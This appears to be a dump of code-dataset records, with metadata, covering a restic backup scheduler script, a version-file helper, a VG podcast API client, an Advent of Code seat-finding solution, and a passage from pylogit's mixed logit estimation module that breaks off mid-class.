    delays = [cron.next(now, default_utc=False) for cron in crontab]
    # min of all delays; -1 (i.e. one second in the past) for an empty list,
    # matching the original accumulator's initial value.
    return now + timedelta(seconds=min(delays, default=-1))
def load_config():
    """Load the optional YAML backup configuration.

    Returns {} when no BACKUP_CONFIG env var is set, the parsed config on
    success, or None when the file is missing or unreadable (callers treat
    None as a fatal configuration error).
    """
    config_file = get_env('BACKUP_CONFIG', None)
    if config_file is None:
        return {}
    if not os.path.exists(config_file):
        log.error('Config does not exist: %s' % config_file)
        # Fix: previously fell through and failed again inside open().
        return None
    try:
        log.info('Using extra config from %s' % config_file)
        with open(config_file, 'r') as config:
            # safe_load: a config file should never instantiate arbitrary
            # Python objects, and yaml.load without an explicit Loader is
            # rejected by PyYAML >= 6.
            return yaml.safe_load(config)
    except Exception:  # narrowed from a bare except:
        log.exception('Unable to read config file %s' % config_file)
        return None
def run_pre_backup_script(scriptinfo):
    """Execute one configured pre-backup shell script.

    *scriptinfo* must be a dict with a 'script' shell command; optional keys
    are 'fail-on-error' (default True) and 'description'.

    Returns False when the configuration is invalid or the script fails
    fatally, True otherwise (including non-fatal failures).
    """
    # Fix: isinstance instead of `type(x) is not dict` (accepts dict subclasses
    # such as those produced by YAML loaders).
    if not isinstance(scriptinfo, dict):
        log.error("Expected pre-backup-script to be a dict, got: %s",
                  type(scriptinfo).__name__)
        return False
    if 'script' not in scriptinfo:
        log.error("Pre-backup-script does not contain a 'script' property.")
        return False
    fail_on_error = bool(scriptinfo.get('fail-on-error', True))
    if 'description' in scriptinfo:
        log.info("Executing pre-backup-script: %s" % scriptinfo['description'])
    else:
        log.info("Executing pre-backup-script")
    try:
        subprocess.check_call(scriptinfo['script'],
                              stderr=subprocess.STDOUT, shell=True)
        log.info("Pre-backup-script succeeded")
    except subprocess.CalledProcessError as e:
        if fail_on_error:
            log.error("Pre-backup-script failed: %s", e)
            return False
        log.warning("Pre-backup-script failed: %s", e)
    return True
def init_restic_repo():
    """Initialise the restic repository, tolerating an existing one.

    Returns False on a genuine initialisation failure, None otherwise.
    """
    log.info('Initializing repository')
    try:
        subprocess.check_output(['restic', 'init'], stderr=subprocess.STDOUT)
    except subprocess.CalledProcessError as e:
        output = e.output.decode()
        already_done = (
            'repository master key and config already initialized' in output
            or 'config file already exists' in output
        )
        if already_done:
            log.info('Repository was already initialized.')
        else:
            log.error('Initializing repository failed: %s' % output)
            return False
    else:
        log.info('Repository initialized.')
def _run_dump_job(backup_root, name, dump_with_config, job_config):
    """Recreate <backup_root>/<name> and run one database-dump job into it.

    Returns True on success, False when directory setup or the dump failed.
    """
    dump_dir = os.path.join(backup_root, name)
    # Best-effort removal of the previous dump directory.
    shutil.rmtree(dump_dir, ignore_errors=True)
    if os.path.exists(dump_dir):
        log.error('Unable to delete old %s dir at %s' % (name, dump_dir))
        # Fix: abort cleanly instead of crashing on the os.mkdir below.
        return False
    os.mkdir(dump_dir)
    log.info('Running %s to %s' % (name, dump_dir))
    if not dump_with_config(dump_dir, job_config):
        log.error('%s failed. Backup canceled.' % name.capitalize())
        return False
    return True


def run_backup():
    """Run one full backup cycle: pre-scripts, dump jobs, restic, rotation.

    Returns True on success, False on any failure (main() exits non-zero
    when this is falsy).
    """
    backup_root = get_env('BACKUP_ROOT')
    init_restic_repo()
    config = load_config()
    if config is None:
        return False
    if not os.path.exists(backup_root):
        log.info('Backup mount point not found %s. Creating internal mount point for dump jobs. This might be ok if you only backup database dumps.' % backup_root)
        os.mkdir(backup_root)
    if 'pre-backup-scripts' in config:
        for script in config['pre-backup-scripts']:
            if not run_pre_backup_script(script):
                log.error('Stopped due to pre-backup script failures')
                return False
    # All supported dump jobs follow the same recreate-dir/run/fail pattern,
    # so drive them from a single table (was five copy-pasted sections).
    dump_jobs = [
        ('elasticdump', elasticdump.es_dump_with_config),
        ('mysqldump', mysqldump.mysql_dump_with_config),
        ('pgdump', pgdump.pg_dump_with_config),
        ('mongodump', mongodump.mongodump_with_config),
        ('influxdump', influxdump.influxdump_with_config),
    ]
    for name, dump_fn in dump_jobs:
        if name in config:
            if not _run_dump_job(backup_root, name, dump_fn, config[name]):
                return False
    cmd = [
        'nice', '-n19',
        'ionice', '-c3',
        'restic',
        'backup',
        '--host', get_env('BACKUP_HOSTNAME'),
    ]
    # exclude caches (http://bford.info/cachedir/spec.html)
    if not ('exclude-caches' in config and bool(config['exclude-caches'])):
        cmd.append('--exclude-caches')
    # ignore inode for changed-file checks (default is true)
    if not ('ignore-inode' in config and bool(config['ignore-inode'])):
        cmd.append('--ignore-inode')
    # set cacheDir if not the default one should be used
    if 'cache-dir' in config:
        log.info("cache-dir is: " + config['cache-dir'])
        cmd += ['--cache-dir', config['cache-dir']]
    # include files to backupset from given files
    if 'include-from' in config:
        includes = config['include-from']
        if not isinstance(includes, list):
            includes = [includes]
        for include in includes:
            log.info("Use include from: %s" % include)
            cmd += ['--files-from', include]
    # exclude other files
    if 'exclude' in config:
        excludes = config['exclude']
        if not isinstance(excludes, list):
            excludes = [excludes]
        for exclude in excludes:
            log.info("Excluding: %s" % exclude)
            cmd += ['--exclude', exclude]
    # without include-from, back up the whole backup root
    if 'include-from' not in config:
        cmd.append(backup_root)
    log.info('Starting backup')
    try:
        subprocess.check_call(cmd, stderr=subprocess.STDOUT)
        log.info('Backup finished.')
    except subprocess.CalledProcessError:
        log.info('Backup failed.')
        return False
    clean_old_backups(config, True)
    # Fix: previously fell off the end returning None, which made main()
    # treat every successful backup as a failure (exit code 1).
    return True
def clean_old_backups(config=None, prune=False):
    """Forget and prune old snapshots according to the retention policy.

    Retention comes from config['keep'] or, failing that, from KEEP_*
    environment variables. Returns False when the config cannot be loaded,
    True otherwise (a failed cleanup run is logged but non-fatal).

    NOTE(review): the *prune* parameter is currently unused -- '--prune' is
    always passed to restic; kept for interface compatibility.
    """
    if config is None:
        # Direct call (rotate command): initialise first.
        config = load_config()
        init_restic_repo()
        if config is None:
            return False
    cleanup_command = ['restic', 'forget', '--prune']
    keep_types = ['last', 'hourly', 'daily', 'weekly', 'monthly', 'yearly']
    keep_is_valid = False
    if 'keep' in config:
        keep = config['keep']
        for keep_type in keep_types:
            if keep_type in keep:
                keep_is_valid = True
                cleanup_command += ['--keep-%s' % keep_type, str(keep[keep_type])]
        if not keep_is_valid:
            log.warn('Keep configuration is invalid - not deleting old backups.')
            # Fix: return True so main()'s `if not result` check does not
            # turn this warning into exit code 1.
            return True
    else:
        for keep_type in keep_types:
            keep_env = 'KEEP_%s' % (keep_type.upper())
            if keep_env in environ:
                keep_is_valid = True
                cleanup_command += ['--keep-%s' % keep_type, str(environ[keep_env])]
        if not keep_is_valid:
            log.warn('Rotation not configured. Keeping backups forever.')
            return True
    log.info('Unlocking repository')
    subprocess.check_call(['restic', 'unlock'], stderr=subprocess.STDOUT)
    log.info('Deleting old backups')
    try:
        subprocess.check_call(cleanup_command, stderr=subprocess.STDOUT)
        # Fix: this message wrongly said 'Backup finished.'
        log.info('Cleanup finished.')
    except subprocess.CalledProcessError:
        log.warn('Cleanup failed!')
    return True
def schedule_backup(crontab):
    """Run backups forever, sleeping until each next scheduled time."""
    while True:
        next_schedule = get_next_schedule(crontab)
        log.info('Scheduling next backup at %s' % next_schedule)
        # Poll in 10-second steps until the scheduled moment has passed.
        while datetime.now() < next_schedule:
            time.sleep(10)
        try:
            run_backup()
        except:  # deliberately broad: the scheduler must never die
            log.exception("Something went unexpectedly wrong!")
def main():
    """Entry point: parse the sub-command and run, rotate or schedule backups."""
    log.basicConfig(level=log.INFO,
                    format='%(asctime)s %(levelname)7s: %(message)s')
    parser = argparse.ArgumentParser(description='Perform backups with restic')
    subparsers = parser.add_subparsers(help='sub-command help', dest='cmd')
    subparsers.required = True
    subparsers.add_parser('run', help='Run a backup now and rotate afterwards.')
    subparsers.add_parser('rotate', help='Rotate backups now.')
    parser_schedule = subparsers.add_parser('schedule', help='Schedule backups.')
    parser_schedule.add_argument(
        'cronexpression', nargs='+', action=ParseCronExpressions,
        help='Time to schedule the backup (cron expression, see https://pypi.org/project/crontab/)')
    args = parser.parse_args()

    # Fail fast on missing mandatory environment variables.
    get_env('RESTIC_REPOSITORY')
    get_env('RESTIC_PASSWORD')
    get_env('BACKUP_HOSTNAME')
    get_env('BACKUP_ROOT')

    # Fix: the original used two independent `if` statements, so the 'run'
    # command fell through into the schedule `else` branch and crashed on
    # the missing args.cronexpression attribute.
    if args.cmd == 'run':
        if not run_backup():
            raise SystemExit(1)
    elif args.cmd == 'rotate':
        if not clean_old_backups(None, True):
            raise SystemExit(1)
    else:
        schedule_backup(args.cronexpression)


if __name__ == '__main__':
    main()
| 28.712366 | 155 | 0.735137 | 1,522 | 10,681 | 5.02431 | 0.187911 | 0.021054 | 0.019616 | 0.0085 | 0.185171 | 0.138355 | 0.099516 | 0.049954 | 0.049954 | 0.049954 | 0 | 0.001961 | 0.14053 | 10,681 | 371 | 156 | 28.789757 | 0.831046 | 0.030147 | 0 | 0.248387 | 0 | 0.003226 | 0.247416 | 0.002319 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041935 | false | 0.019355 | 0.051613 | 0 | 0.170968 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
415fd9ca7dc3dd7e0ad28f54f3222836570e36ec | 229 | py | Python | helpers/version.py | Dabalon/blues_bot.py | b153f65054ce973e16c5fd1e2061ce1fe50145d1 | [
"MIT"
] | 5 | 2020-01-05T18:53:20.000Z | 2022-03-19T13:01:24.000Z | helpers/version.py | Dabalon/blues_bot.py | b153f65054ce973e16c5fd1e2061ce1fe50145d1 | [
"MIT"
] | 22 | 2019-10-27T00:56:30.000Z | 2021-07-13T16:42:24.000Z | helpers/version.py | Dabalon/blues_bot.py | b153f65054ce973e16c5fd1e2061ce1fe50145d1 | [
"MIT"
] | 11 | 2020-01-05T18:53:22.000Z | 2022-03-30T22:20:13.000Z | # Version command helper
def get_version():
""" Opens version file and returns it as a string """
file = open("assets/version", "r")
ret = ''
for line in file:
ret += line
file.close()
return ret
| 20.818182 | 57 | 0.585153 | 31 | 229 | 4.290323 | 0.709677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.292576 | 229 | 10 | 58 | 22.9 | 0.820988 | 0.305677 | 0 | 0 | 0 | 0 | 0.098684 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
416700a551016e3c3062ddbef52da0802e586ce3 | 1,849 | py | Python | podcastapi.py | rexxars/kodi-vg-podcasts | f5151b78717533e97a3d70439946654228adca70 | [
"MIT"
] | null | null | null | podcastapi.py | rexxars/kodi-vg-podcasts | f5151b78717533e97a3d70439946654228adca70 | [
"MIT"
] | null | null | null | podcastapi.py | rexxars/kodi-vg-podcasts | f5151b78717533e97a3d70439946654228adca70 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2016 Espen Hovlandsdal
from requests import Session
# Base endpoint of VG's podcast JSON API; paths are appended in _get().
API_URL = 'http://api.vg.no/podcast';

# One shared session so connection reuse and the headers below apply to
# every request made by this module.
session = Session()
session.headers['User-Agent'] = 'kodi-vg-podcasts'
session.headers['Accept'] = 'application/json'
class Base(object):
    """Common attribute container for API entities.

    The class-level defaults below mean any field not supplied to the
    constructor reads as None on the instance.
    """

    # Defaults; instance attributes assigned in __init__ shadow these.
    id = None
    title = None
    subtitle = None
    thumb = None
    logo = None

    def __init__(self, **kwargs):
        # Equivalent to self.__dict__.update(kwargs): every keyword
        # argument becomes an instance attribute of the same name.
        for attr_name, attr_value in kwargs.items():
            setattr(self, attr_name, attr_value)
class Show(Base):
    """A podcast show as returned by the /shows.json endpoint."""

    @staticmethod
    def from_response(r):
        """Build a Show from one decoded JSON response item."""
        fields = {
            'id': r['slug'],
            'title': r['name'],
            'subtitle': r['subtitle'],
            'logo': r['logo'],
            'thumb': r['logoThumb'],
        }
        return Show(**fields)
class Episode(Base):
    """A single podcast episode, including its playable media URL."""

    # Episode-specific defaults in addition to the Base fields.
    duration = 0
    media_url = None
    year = 2015

    @staticmethod
    def from_response(r):
        """Build an Episode from one decoded JSON response item."""
        # URL of the first mp3 attachment, or None when there is none
        # (same semantics as the original break-on-first-match loop).
        url = next(
            (a['url'] for a in r['attachments'] if a['format'] == 'mp3'),
            None)
        return Episode(
            id=r['slug'],
            title=r['title'],
            subtitle=r['subtitle'],
            logo=r['logo'],
            thumb=r['logoThumb'],
            year=get_year(r['pubDate']),
            duration=parse_duration(r['duration']),
            media_url=url)
def shows():
    """Fetch every show listed by the API as a list of Show objects."""
    response_items = _get('/shows.json')
    return [Show.from_response(item) for item in response_items]
def episodes(slug):
    """Fetch all episodes of the show identified by `slug`."""
    payload = _get('/' + slug + '.json')
    return [Episode.from_response(item) for item in payload['episodes']]
def parse_duration(dur):
    """Convert a colon-separated duration ("[hh:]mm:ss") into seconds."""
    total = 0
    # Left-to-right fold: each colon shifts the accumulated value up one
    # base-60 position — identical to the original reversed-multiplier sum.
    for part in dur.split(':'):
        total = total * 60 + int(part)
    return total
def get_year(date):
    """Return the four-digit year prefix of an ISO-style date string."""
    year_text = date[:4]
    return int(year_text)
def _get(path):
    """GET `path` relative to API_URL and return the decoded JSON body.

    Uses the module-level session; raises for non-2xx responses via
    raise_for_status().
    """
    response = session.get(API_URL + path)
    response.raise_for_status()
    return response.json()
| 22.277108 | 69 | 0.559221 | 218 | 1,849 | 4.62844 | 0.389908 | 0.047572 | 0.037661 | 0.053518 | 0.212091 | 0.130823 | 0.081269 | 0.081269 | 0.081269 | 0 | 0 | 0.01542 | 0.29854 | 1,849 | 82 | 70 | 22.54878 | 0.762529 | 0.034072 | 0 | 0.15873 | 0 | 0 | 0.109428 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.126984 | false | 0 | 0.015873 | 0.047619 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
416ad546e81165ecbce7d3668b0084d159819a2c | 442 | py | Python | src/year2020/day05b.py | lancelote/advent_of_code | 06dda6ca034bc1e86addee7798bb9b2a34ff565b | [
"Unlicense"
] | 10 | 2017-12-11T17:54:52.000Z | 2021-12-09T20:16:30.000Z | src/year2020/day05b.py | lancelote/advent_of_code | 06dda6ca034bc1e86addee7798bb9b2a34ff565b | [
"Unlicense"
] | 260 | 2015-12-09T11:03:03.000Z | 2021-12-12T14:32:23.000Z | src/year2020/day05b.py | lancelote/advent_of_code | 06dda6ca034bc1e86addee7798bb9b2a34ff565b | [
"Unlicense"
] | null | null | null | """2020 - Day 5 Part 2: Binary Boarding."""
from src.year2020.day05a import process_data
def solve(task: str) -> int:
    """Find the single empty seat ID on the plane.

    The missing seat is the one ID strictly between the lowest and highest
    occupied seat IDs that appears on no boarding pass.
    """
    seats = process_data(task)
    first = min(seats).pk
    last = max(seats).pk
    ideal = set(range(first, last))
    real = {seat.pk for seat in seats}
    difference = ideal.difference(real)
    # BUG FIX: the original asserted only `len(difference)` (non-empty),
    # although its message claims a single seat; check the real invariant
    # so unexpected extra gaps in the seat IDs are reported too.
    assert len(difference) == 1, "difference is not a single seat"
    return difference.pop()
| 26 | 61 | 0.658371 | 64 | 442 | 4.515625 | 0.6875 | 0.076125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034483 | 0.21267 | 442 | 16 | 62 | 27.625 | 0.795977 | 0.128959 | 0 | 0 | 0 | 0 | 0.082888 | 0 | 0 | 0 | 0 | 0 | 0.1 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41716acd74ef124d89f5dce40e0eba84b378df21 | 43,180 | py | Python | src/pylogit/mixed_logit.py | mathijsvdv/pylogit | 2e7a06907d11b6fe02d3f3f9df91d374ed8a0c6d | [
"BSD-3-Clause"
] | 153 | 2016-03-22T05:52:41.000Z | 2022-02-09T13:33:20.000Z | src/pylogit/mixed_logit.py | mathijsvdv/pylogit | 2e7a06907d11b6fe02d3f3f9df91d374ed8a0c6d | [
"BSD-3-Clause"
] | 63 | 2016-03-22T05:47:56.000Z | 2021-12-23T12:01:29.000Z | src/pylogit/mixed_logit.py | mathijsvdv/pylogit | 2e7a06907d11b6fe02d3f3f9df91d374ed8a0c6d | [
"BSD-3-Clause"
] | 91 | 2016-05-27T06:04:38.000Z | 2022-03-13T20:00:15.000Z | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 18 18:15:50 2016
@name: Mixed MultiNomial Logit
@author: Timothy Brathwaite
@summary: Contains functions necessary for estimating mixed multinomial logit
models (with the help of the "base_multinomial_cm.py" file).
Version 1 only works for MNL kernels and only for mixing of index
coefficients.
General References
------------------
Train, K., 2009. Discrete Choice Models With Simulation. 2 ed., Cambridge
University Press, New York, NY, USA.
"""
from __future__ import absolute_import
import warnings
import numpy as np
from scipy.sparse import csr_matrix
from . import base_multinomial_cm_v2 as base_mcm
from . import choice_calcs as cc
from . import mixed_logit_calcs as mlc
from .choice_tools import get_dataframe_from_data
from .choice_tools import create_design_matrix
from .choice_tools import create_long_form_mappings
from .display_names import model_type_to_display_name
from .estimation import EstimationObj
from .estimation import estimate
# Alias necessary functions for model estimation
general_calc_probabilities = cc.calc_probabilities
general_sequence_probs = mlc.calc_choice_sequence_probs
general_log_likelihood = mlc.calc_mixed_log_likelihood
general_gradient = mlc.calc_mixed_logit_gradient
general_bhhh = mlc.calc_bhhh_hessian_approximation_mixed_logit

# Warning issued when users pass shape-related keywords: the Mixed MNL
# kernel has no shape parameters, so those arguments are ignored.
_msg_1 = "The Mixed MNL Model has no shape parameters. "
_msg_2 = "shape_names and shape_ref_pos will be ignored if passed."
_shape_ignore_msg = _msg_1 + _msg_2

# Create a warning string that will be issued if ridge regression is performed.
_msg_3 = "NOTE: An L2-penalized regression is being performed. The "
_msg_4 = "reported standard errors and robust standard errors "
_msg_5 = "***WILL BE INCORRECT***."
_ridge_warning_msg = _msg_3 + _msg_4 + _msg_5
def split_param_vec(beta, return_all_types=False, *args, **kwargs):
    """
    Split an estimated parameter vector into its constituent pieces.

    Parameters
    ----------
    beta : 1D numpy array.
        All elements should be ints, floats, or longs. Should have one
        element for each utility coefficient being estimated
        (i.e. num_features).
    return_all_types : bool, optional.
        If True, a 4-tuple `(nests, shapes, intercepts, betas)` is
        returned; if False, a 3-tuple `(shapes, intercepts, betas)`.
        Default == False.

    Returns
    -------
    tuple.
        `(None, None, beta)` or `(None, None, None, beta)`. The Mixed
        Logit model has no nest, shape, or outside-intercept parameters,
        so only the index coefficients are meaningful; this function
        exists for interface compatibility with the other choice model
        files.
    """
    leading_nones = (None, None, None) if return_all_types else (None, None)
    return leading_nones + (beta,)
def mnl_utility_transform(sys_utility_array, *args, **kwargs):
    """
    Ensure the systematic utilities are two-dimensional.

    Parameters
    ----------
    sys_utility_array : ndarray.
        1D or 2D array produced by the dot product of a design matrix
        and an array of index coefficients.

    Returns
    -------
    systematic_utilities : 2D ndarray.
        `sys_utility_array` unchanged when it is already 2D; otherwise
        `sys_utility_array[:, None]`.
    """
    # The MNL kernel applies no transformation; just guarantee a column
    # axis exists so downstream code can rely on 2D shapes.
    if sys_utility_array.ndim == 1:
        return sys_utility_array[:, np.newaxis]
    return sys_utility_array
def check_length_of_init_values(design_3d, init_values):
    """
    Ensure the initial values match the design array they will be
    dot-producted with, raising a ValueError with a helpful message
    otherwise.

    Parameters
    ----------
    design_3d : 3D ndarray.
        Expanded design array whose last axis holds one entry per index
        coefficient being estimated. (The original docstring mislabeled
        this as 2D; the code reads `design_3d.shape[2]`.)
    init_values : 1D ndarray.
        Initial values for the optimization, one per index coefficient.

    Returns
    -------
    None.

    Raises
    ------
    ValueError
        If `init_values` does not have exactly `design_3d.shape[2]`
        elements.
    """
    expected_dim = design_3d.shape[2]
    if init_values.shape[0] != expected_dim:
        msg_1 = "The initial values are of the wrong dimension. "
        msg_2 = "They should be of dimension {}".format(expected_dim)
        raise ValueError(msg_1 + msg_2)
    return None
def add_mixl_specific_results_to_estimation_res(estimator, results_dict):
    """
    Add mixed-logit-only quantities to the estimation results.

    Computes the simulated probability of each observed sequence of
    choices, given the random-coefficient draws, and stores both the
    per-mixing-unit probabilities and their long-format expansion on
    `results_dict`.

    Parameters
    ----------
    estimator : an instance of the MixedEstimator class.
        Must expose `choice_vector` (1D ndarray of the choices made for
        this model's dataset) and `rows_to_mixers` (maps each long-format
        row to the unit of observation the mixing is performed over).
    results_dict : dict.
        The dictionary returned from scipy.optimize.minimize; must
        contain the key `long_probs`.

    Returns
    -------
    results_dict.
    """
    sequence_args = (results_dict["long_probs"],
                     estimator.choice_vector,
                     estimator.rows_to_mixers)
    prob_res = mlc.calc_choice_sequence_probs(*sequence_args,
                                              return_type='all')
    # First element: one probability per mixing unit; second: the same
    # values expanded back onto the long-format rows.
    results_dict["simulated_sequence_probs"] = prob_res[0]
    results_dict["expanded_sequence_probs"] = prob_res[1]
    return results_dict
class MixedEstimator(EstimationObj):
    """
    Estimation object for the Mixed Logit Model.

    Parameters
    ----------
    model_obj : a pylogit.base_multinomial_cm_v2.MNDC_Model instance.
        Should contain the following attributes: `alt_IDs`, `choices`,
        `design`, `intercept_ref_position`, `shape_ref_position`,
        `utility_transform`, and `design_3d`.
    mapping_dict : dict.
        Should contain the scipy sparse matrices that map the rows of the
        long format dataframe to various other objects such as the
        available alternatives, the unique observations, etc. The keys
        that it must have are
        `['rows_to_obs', 'rows_to_alts', 'chosen_row_to_obs']`.
    ridge : int, float, long, or None.
        Determines whether or not ridge regression is performed. If a
        scalar is passed, then that scalar determines the ridge penalty
        for the optimization. The scalar should be greater than or equal
        to zero.
    zero_vector : 1D ndarray.
        Determines what is viewed as a "null" set of parameters. It is
        explicitly passed because some parameters (e.g. parameters that
        must be greater than zero) have their null values at values other
        than zero.
    split_params : callable.
        Should take a vector of parameters, `mapping_dict['rows_to_alts']`,
        and `model_obj.design` as arguments. Should return a tuple
        containing separate arrays for the model's shape, outside
        intercept, and index coefficients. For each of these arrays, if
        this model does not contain the particular type of parameter, the
        callable should place a `None` in its place in the tuple.
    constrained_pos : list or None, optional.
        Denotes the positions of the array of estimated parameters that
        are not to change from their initial values. If a list is passed,
        the elements are to be integers where no such integer is greater
        than `init_values.size.` Default == None.
    weights : 1D ndarray or None, optional.
        Allows for the calculation of weighted log-likelihoods. The
        weights can represent various things. In stratified samples, the
        weights may be the proportion of the observations in a given
        strata for a sample in relation to the proportion of observations
        in that strata in the population. In latent class models, the
        weights may be the probability of being a particular class.
    """
    def __init__(self,
                 model_obj,
                 mapping_dict,
                 ridge,
                 zero_vector,
                 split_params,
                 constrained_pos=None,
                 weights=None):
        super(MixedEstimator, self).__init__(model_obj,
                                             mapping_dict,
                                             ridge,
                                             zero_vector,
                                             split_params,
                                             constrained_pos=constrained_pos,
                                             weights=weights)

        # Add the 3d design matrix to the object. It is the design matrix
        # expanded across the random-coefficient draws.
        self.design_3d = model_obj.design_3d

        return None

    def convenience_split_params(self, params, return_all_types=False):
        """
        Splits parameter vector into shape, intercept, and index parameters.

        Parameters
        ----------
        params : 1D ndarray.
            The array of parameters being estimated or used in calculations.
        return_all_types : bool, optional.
            Determines whether or not a tuple of 4 elements will be returned
            (with one element for the nest, shape, intercept, and index
            parameters for this model). If False, a tuple of 3 elements will
            be returned with one element for the shape, intercept, and index
            parameters.

        Returns
        -------
        tuple. Will have 4 or 3 elements based on `return_all_types`.
        """
        return self.split_params(params,
                                 return_all_types=return_all_types)

    def check_length_of_initial_values(self, init_values):
        """
        Ensures that the initial values are of the correct length, raising
        a ValueError (via the module-level helper) otherwise.
        """
        return check_length_of_init_values(self.design_3d, init_values)

    def convenience_calc_probs(self, params):
        """
        Calculates the probabilities of the chosen alternative, and the long
        format probabilities for this model and dataset.
        """
        shapes, intercepts, betas = self.convenience_split_params(params)

        prob_args = (betas,
                     self.design_3d,
                     self.alt_id_vector,
                     self.rows_to_obs,
                     self.rows_to_alts,
                     self.utility_transform)
        prob_kwargs = {"chosen_row_to_obs": self.chosen_row_to_obs,
                       "return_long_probs": True}
        probability_results = general_calc_probabilities(*prob_args,
                                                         **prob_kwargs)

        return probability_results

    def convenience_calc_log_likelihood(self, params):
        """
        Calculates the log-likelihood for this model and dataset.
        """
        shapes, intercepts, betas = self.convenience_split_params(params)

        args = [betas,
                self.design_3d,
                self.alt_id_vector,
                self.rows_to_obs,
                self.rows_to_alts,
                self.rows_to_mixers,
                self.choice_vector,
                self.utility_transform]
        kwargs = {"ridge": self.ridge, "weights": self.weights}

        log_likelihood = general_log_likelihood(*args, **kwargs)

        return log_likelihood

    def convenience_calc_gradient(self, params):
        """
        Calculates the gradient of the log-likelihood for this model / dataset.
        """
        shapes, intercepts, betas = self.convenience_split_params(params)

        args = [betas,
                self.design_3d,
                self.alt_id_vector,
                self.rows_to_obs,
                self.rows_to_alts,
                self.rows_to_mixers,
                self.choice_vector,
                self.utility_transform]

        return general_gradient(*args, ridge=self.ridge, weights=self.weights)

    def convenience_calc_hessian(self, params):
        """
        Calculates the hessian of the log-likelihood for this model / dataset.
        Note that this function name is INCORRECT with regard to the actual
        actions performed. The Mixed Logit model uses the BHHH approximation
        to the Fisher Information Matrix in place of the actual hessian.
        """
        shapes, intercepts, betas = self.convenience_split_params(params)

        args = [betas,
                self.design_3d,
                self.alt_id_vector,
                self.rows_to_obs,
                self.rows_to_alts,
                self.rows_to_mixers,
                self.choice_vector,
                self.utility_transform]

        approx_hess =\
            general_bhhh(*args, ridge=self.ridge, weights=self.weights)

        # Account for the constrained position when presenting the results of
        # the approximate hessian: zero out the constrained rows/columns and
        # place -1 on the diagonal so the matrix stays invertible.
        if self.constrained_pos is not None:
            for idx_val in self.constrained_pos:
                approx_hess[idx_val, :] = 0
                approx_hess[:, idx_val] = 0
                approx_hess[idx_val, idx_val] = -1

        return approx_hess

    def convenience_calc_fisher_approx(self, params):
        """
        Calculates the BHHH approximation of the Fisher Information Matrix for
        this model / dataset. Note that this function name is INCORRECT with
        regard to the actual actions performed. The Mixed Logit model uses a
        placeholder for the BHHH approximation of the Fisher Information Matrix
        because the BHHH approximation is already being used to approximate the
        hessian.

        This placeholder allows calculation of a value for the 'robust'
        standard errors, even though such a value is not useful since it is not
        correct...
        """
        shapes, intercepts, betas = self.convenience_split_params(params)

        # Negative identity placeholder, sized to the index coefficients.
        placeholder_bhhh = np.diag(-1 * np.ones(betas.shape[0]))

        return placeholder_bhhh
class MixedLogit(base_mcm.MNDC_Model):
"""
Parameters
----------
data : string or pandas dataframe.
If string, data should be an absolute or relative path to a CSV
file containing the long format data for this choice model. Note
long format has one row per available alternative for each
observation. If pandas dataframe, the dataframe should be the long
format data for the choice model.
alt_id_col : str.
Should denote the column in data which contains the alternative
identifiers for each row.
obs_id_col : str.
Should denote the column in data which contains the observation
identifiers for each row.
choice_col : str.
Should denote the column in data which contains the ones and zeros
that denote whether or not the given row corresponds to the chosen
alternative for the given individual.
specification : OrderedDict.
Keys are a proper subset of the columns in long_form_df. Values are
either a list or a single string, `all_diff` or `all_same`. If a
list, the elements should be one of the following:
- single objects that are within the alternative ID
column of long_form_df
- lists of objects that are within the alternative
ID column of long_form_df.
For each single object in the list, a unique column will be created
(i.e. there will be a unique coefficient for that variable in the
corresponding utility equation of the corresponding alternative).
For lists within the specification_dict values, a single column
will be created for all the alternatives within iterable (i.e.
there will be one common coefficient for the variables in the
iterable).
names : OrderedDict, optional.
Should have the same keys as `specification_dict`. For each key:
- if the corresponding value in specification_dict is "all_same",
then there should be a single string as the value in names.
- if the corresponding value in specification_dict is "all_diff",
then there should be a list of strings as the value in names.
There should be one string in the value in names for each
- if the corresponding value in specification_dict is a list, then
there should be a list of strings as the value in names. There
should be one string in the value in names per item in the value
in specification_dict. Default == None.
mixing_id_col : str, or None, optional.
Should be a column heading in `data`. Should denote the column in
`data` which contains the identifiers of the units of observation over
which the coefficients of the model are thought to be randomly
distributed. If `model_type == "Mixed Logit"`, then `mixing_id_col`
must be passed. Default == None.
mixing_vars : list, or None, optional.
All elements of the list should be strings. Each string should be
present in the values of `names.values()` and they're associated
variables should only be index variables (i.e. part of the design
matrix). If `model_type == "Mixed Logit"`, then `mixing_vars` must be
passed. Default == None.
Methods
-------
panel_predict(new_data, num_draws, return_long_probs, choice_col, seed)
Predicts the probability of each individual in `new_data` making each
possible choice in each choice situation they are faced with. This
method differs from the `predict()` function by using 'individualized
coefficient distributions' that are conditioned on each person's past
choices and choice situations (if there are any).
"""
def __init__(self,
